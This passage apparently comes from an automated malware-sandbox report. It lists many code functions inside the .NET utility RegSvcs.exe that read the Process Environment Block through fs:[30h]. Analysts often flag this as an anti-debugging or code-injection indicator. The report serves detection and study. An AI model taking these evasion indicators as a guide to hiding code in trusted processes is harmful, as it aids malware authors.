Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB9240 mov eax, dword ptr fs:[00000030h]	1_2_00FB9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB9240 mov eax, dword ptr fs:[00000030h]	1_2_00FB9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB9240 mov eax, dword ptr fs:[00000030h]	1_2_00FB9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB9240 mov eax, dword ptr fs:[00000030h]	1_2_00FB9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010353CA mov eax, dword ptr fs:[00000030h]	1_2_010353CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010353CA mov eax, dword ptr fs:[00000030h]	1_2_010353CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB236 mov eax, dword ptr fs:[00000030h]	1_2_00FDB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB236 mov eax, dword ptr fs:[00000030h]	1_2_00FDB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB236 mov eax, dword ptr fs:[00000030h]	1_2_00FDB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB236 mov eax, dword ptr fs:[00000030h]	1_2_00FDB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB236 mov eax, dword ptr fs:[00000030h]	1_2_00FDB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB236 mov eax, dword ptr fs:[00000030h]	1_2_00FDB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF4A2C mov eax, dword ptr fs:[00000030h]	1_2_00FF4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF4A2C mov eax, dword ptr fs:[00000030h]	1_2_00FF4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA229 mov eax, dword ptr fs:[00000030h]	1_2_00FDA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA229 mov eax, dword ptr fs:[00000030h]	1_2_00FDA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA229 mov eax, dword ptr fs:[00000030h]	1_2_00FDA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA229 mov eax, dword ptr fs:[00000030h]	1_2_00FDA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA229 mov eax, dword ptr fs:[00000030h]	1_2_00FDA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA229 mov eax, dword ptr fs:[00000030h]	1_2_00FDA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA229 mov eax, dword ptr fs:[00000030h]	1_2_00FDA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA229 mov eax, dword ptr fs:[00000030h]	1_2_00FDA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA229 mov eax, dword ptr fs:[00000030h]	1_2_00FDA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD3A1C mov eax, dword ptr fs:[00000030h]	1_2_00FD3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010623E3 mov ecx, dword ptr fs:[00000030h]	1_2_010623E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010623E3 mov ecx, dword ptr fs:[00000030h]	1_2_010623E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010623E3 mov eax, dword ptr fs:[00000030h]	1_2_010623E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB5210 mov eax, dword ptr fs:[00000030h]	1_2_00FB5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB5210 mov ecx, dword ptr fs:[00000030h]	1_2_00FB5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB5210 mov eax, dword ptr fs:[00000030h]	1_2_00FB5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB5210 mov eax, dword ptr fs:[00000030h]	1_2_00FB5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBAA16 mov eax, dword ptr fs:[00000030h]	1_2_00FBAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBAA16 mov eax, dword ptr fs:[00000030h]	1_2_00FBAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC8A0A mov eax, dword ptr fs:[00000030h]	1_2_00FC8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107AA16 mov eax, dword ptr fs:[00000030h]	1_2_0107AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107AA16 mov eax, dword ptr fs:[00000030h]	1_2_0107AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDDBE9 mov eax, dword ptr fs:[00000030h]	1_2_00FDDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FE03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FE03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FE03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FE03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FE03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FE03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071229 mov eax, dword ptr fs:[00000030h]	1_2_01071229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE53C5 mov eax, dword ptr fs:[00000030h]	1_2_00FE53C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107EA55 mov eax, dword ptr fs:[00000030h]	1_2_0107EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01044257 mov eax, dword ptr fs:[00000030h]	1_2_01044257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE4BAD mov eax, dword ptr fs:[00000030h]	1_2_00FE4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE4BAD mov eax, dword ptr fs:[00000030h]	1_2_00FE4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE4BAD mov eax, dword ptr fs:[00000030h]	1_2_00FE4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0106B260 mov eax, dword ptr fs:[00000030h]	1_2_0106B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0106B260 mov eax, dword ptr fs:[00000030h]	1_2_0106B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDEB9A mov eax, dword ptr fs:[00000030h]	1_2_00FDEB9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDEB9A mov eax, dword ptr fs:[00000030h]	1_2_00FDEB9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE2397 mov eax, dword ptr fs:[00000030h]	1_2_00FE2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01088A62 mov eax, dword ptr fs:[00000030h]	1_2_01088A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEB390 mov eax, dword ptr fs:[00000030h]	1_2_00FEB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC1B8F mov eax, dword ptr fs:[00000030h]	1_2_00FC1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC1B8F mov eax, dword ptr fs:[00000030h]	1_2_00FC1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE138B mov eax, dword ptr fs:[00000030h]	1_2_00FE138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE138B mov eax, dword ptr fs:[00000030h]	1_2_00FE138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE138B mov eax, dword ptr fs:[00000030h]	1_2_00FE138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE3B7A mov eax, dword ptr fs:[00000030h]	1_2_00FE3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE3B7A mov eax, dword ptr fs:[00000030h]	1_2_00FE3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBDB60 mov ecx, dword ptr fs:[00000030h]	1_2_00FBDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBF358 mov eax, dword ptr fs:[00000030h]	1_2_00FBF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBDB40 mov eax, dword ptr fs:[00000030h]	1_2_00FBDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074AEF mov eax, dword ptr fs:[00000030h]	1_2_01074AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDA309 mov eax, dword ptr fs:[00000030h]	1_2_00FDA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0103A537 mov eax, dword ptr fs:[00000030h]	1_2_0103A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01088D34 mov eax, dword ptr fs:[00000030h]	1_2_01088D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107E539 mov eax, dword ptr fs:[00000030h]	1_2_0107E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01033540 mov eax, dword ptr fs:[00000030h]	1_2_01033540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01063D40 mov eax, dword ptr fs:[00000030h]	1_2_01063D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC849B mov eax, dword ptr fs:[00000030h]	1_2_00FC849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEAC7B mov eax, dword ptr fs:[00000030h]	1_2_00FEAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEAC7B mov eax, dword ptr fs:[00000030h]	1_2_00FEAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEAC7B mov eax, dword ptr fs:[00000030h]	1_2_00FEAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEAC7B mov eax, dword ptr fs:[00000030h]	1_2_00FEAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEAC7B mov eax, dword ptr fs:[00000030h]	1_2_00FEAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEAC7B mov eax, dword ptr fs:[00000030h]	1_2_00FEAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEAC7B mov eax, dword ptr fs:[00000030h]	1_2_00FEAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEAC7B mov eax, dword ptr fs:[00000030h]	1_2_00FEAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEAC7B mov eax, dword ptr fs:[00000030h]	1_2_00FEAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEAC7B mov eax, dword ptr fs:[00000030h]	1_2_00FEAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEAC7B mov eax, dword ptr fs:[00000030h]	1_2_00FEAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01072D82 mov eax, dword ptr fs:[00000030h]	1_2_01072D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01072D82 mov eax, dword ptr fs:[00000030h]	1_2_01072D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01072D82 mov eax, dword ptr fs:[00000030h]	1_2_01072D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01072D82 mov eax, dword ptr fs:[00000030h]	1_2_01072D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01072D82 mov eax, dword ptr fs:[00000030h]	1_2_01072D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01072D82 mov eax, dword ptr fs:[00000030h]	1_2_01072D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01072D82 mov eax, dword ptr fs:[00000030h]	1_2_01072D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB477 mov eax, dword ptr fs:[00000030h]	1_2_00FDB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB477 mov eax, dword ptr fs:[00000030h]	1_2_00FDB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB477 mov eax, dword ptr fs:[00000030h]	1_2_00FDB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB477 mov eax, dword ptr fs:[00000030h]	1_2_00FDB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB477 mov eax, dword ptr fs:[00000030h]	1_2_00FDB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB477 mov eax, dword ptr fs:[00000030h]	1_2_00FDB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB477 mov eax, dword ptr fs:[00000030h]	1_2_00FDB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB477 mov eax, dword ptr fs:[00000030h]	1_2_00FDB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB477 mov eax, dword ptr fs:[00000030h]	1_2_00FDB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB477 mov eax, dword ptr fs:[00000030h]	1_2_00FDB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB477 mov eax, dword ptr fs:[00000030h]	1_2_00FDB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB477 mov eax, dword ptr fs:[00000030h]	1_2_00FDB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD746D mov eax, dword ptr fs:[00000030h]	1_2_00FD746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010805AC mov eax, dword ptr fs:[00000030h]	1_2_010805AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010805AC mov eax, dword ptr fs:[00000030h]	1_2_010805AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEA44B mov eax, dword ptr fs:[00000030h]	1_2_00FEA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE3C3E mov eax, dword ptr fs:[00000030h]	1_2_00FE3C3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE3C3E mov eax, dword ptr fs:[00000030h]	1_2_00FE3C3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE3C3E mov eax, dword ptr fs:[00000030h]	1_2_00FE3C3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01036DC9 mov eax, dword ptr fs:[00000030h]	1_2_01036DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01036DC9 mov eax, dword ptr fs:[00000030h]	1_2_01036DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01036DC9 mov eax, dword ptr fs:[00000030h]	1_2_01036DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01036DC9 mov ecx, dword ptr fs:[00000030h]	1_2_01036DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01036DC9 mov eax, dword ptr fs:[00000030h]	1_2_01036DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01036DC9 mov eax, dword ptr fs:[00000030h]	1_2_01036DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEBC2C mov eax, dword ptr fs:[00000030h]	1_2_00FEBC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0107FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0107FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0107FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107FDE2 mov eax, dword ptr fs:[00000030h]	1_2_0107FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01068DF1 mov eax, dword ptr fs:[00000030h]	1_2_01068DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071C06 mov eax, dword ptr fs:[00000030h]	1_2_01071C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0108740D mov eax, dword ptr fs:[00000030h]	1_2_0108740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0108740D mov eax, dword ptr fs:[00000030h]	1_2_0108740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0108740D mov eax, dword ptr fs:[00000030h]	1_2_0108740D
